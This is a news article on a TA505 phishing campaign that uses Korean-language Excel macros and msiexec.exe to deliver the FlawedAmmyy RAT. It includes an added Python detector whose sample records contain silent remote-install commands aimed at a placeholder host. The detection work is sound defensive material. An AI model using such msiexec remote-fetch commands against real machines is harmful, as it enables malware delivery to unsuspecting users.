On November 24, 2018, the TA505 cybercrime group was last seen busy with its tRAT malware. The team has now surfaced again with a new campaign, this time delivering a remote access trojan known to Microsoft as FlawedAmmyy RAT. The campaign relies on Visual Basic for Applications (VBA), the Microsoft Office macro language that malware authors have abused for decades. On initial inspection, Microsoft security researchers found that the signature of the FlawedAmmyy campaign resembles earlier operations by the TA505 cybercrime group, but this time the direct targets are the Windows computers of Korean users.
The malicious .xls attachment is written in Korean and uses social-engineering wording to entice Korean users to open the spreadsheet, which then automatically triggers the malicious macro it contains. Since its introduction in Office 97 in 1996, 23 years ago, Visual Basic for Applications has been an easy-to-use platform for malware development: it offers enough subroutines to build automated, self-propagating malware for any Windows computer with Microsoft Office installed.
“Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory. The attack starts with an email and .xls attachment with content in the Korean language,” emphasized Microsoft via its official Twitter account, @MsftSecIntel.
Consumer home users of Microsoft Office rarely need macro-enabled documents, but in an enterprise environment the extensive use of macro-enabled documents is common. With VBA, Microsoft turned its Office platform into a development platform as well, allowing simple documents, spreadsheets or presentations to behave like applications themselves. It seems that, 23 years after the release of Office 97, Microsoft has still not solved the problem of virus authors using the macro language to create their malware. Each new version of Office since then has claimed a much more secure environment for all users, yet macro malware remains a common type of malware today, in 2019.
“When opened, the .xls file automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory,” explained Microsoft via its official Twitter account, @MsftSecIntel.
The macro’s main objective is to use msiexec.exe, the Windows Installer system service, to download an MSI archive of FlawedAmmyy from the command-and-control server. Windows will not block the MSI archive because it is digitally signed, and the files it contains will not be blocked by Windows User Account Control the way an unsigned executable would be.
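As an added example (not part of the article or of Microsoft's tooling), the following Python flags the endpoint process pattern this chain produces: an Office application launching msiexec.exe with a remote package URL. The log format and the example.invalid URLs are constructed for the demo; real telemetry would come from Sysmon Event ID 1 or a similar process-creation source.

```python
import re

# Office parents that should never be installing packages from the internet.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
URL_IN_CMDLINE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed process-creation records (key=value fields separated by '|').
# Hostnames use the reserved example.invalid domain; they are placeholders.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\msiexec.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|CommandLine=msiexec.exe /i http://example.invalid/update.msi /q",
    r"Image=C:\Windows\System32\msiexec.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=msiexec.exe /i C:\Users\kim\Downloads\tool.msi",
    r"Image=C:\Windows\System32\msiexec.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=msiexec /q /i https://example.invalid/pkg.msi",
    r"Image=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|ParentImage=C:\Windows\explorer.exe|CommandLine=EXCEL.EXE report.xls",
]


def parse_event(line):
    """Parse one constructed record into lower-cased image basenames plus the raw command line."""
    fields = dict(part.split("=", 1) for part in line.strip().split("|"))
    return {
        "image": fields.get("Image", "").rsplit("\\", 1)[-1].lower(),
        "parent": fields.get("ParentImage", "").rsplit("\\", 1)[-1].lower(),
        "cmdline": fields.get("CommandLine", ""),
    }


def classify(event):
    """Return a severity label for a suspicious msiexec launch, or None if it looks benign."""
    if event["image"] != "msiexec.exe":
        return None
    if not URL_IN_CMDLINE.search(event["cmdline"]):
        return None          # local package installs are routine admin activity
    if event["parent"] in OFFICE_PARENTS:
        return "high"        # Office document fetching a remote MSI: the chain in this campaign
    return "medium"          # remote MSI fetch from another parent still deserves a look


def scan(lines):
    """Return (severity, command line) for every record that matches."""
    hits = []
    for line in lines:
        event = parse_event(line)
        severity = classify(event)
        if severity:
            hits.append((severity, event["cmdline"]))
    return hits


if __name__ == "__main__":
    for severity, cmd in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {cmd}")
```

Pairing this rule with a policy that blocks macros in files downloaded from the internet removes the first link of the chain before msiexec.exe is ever reached.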
“Microsoft Threat Protection defends customers from this attack. Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign,” concluded Microsoft.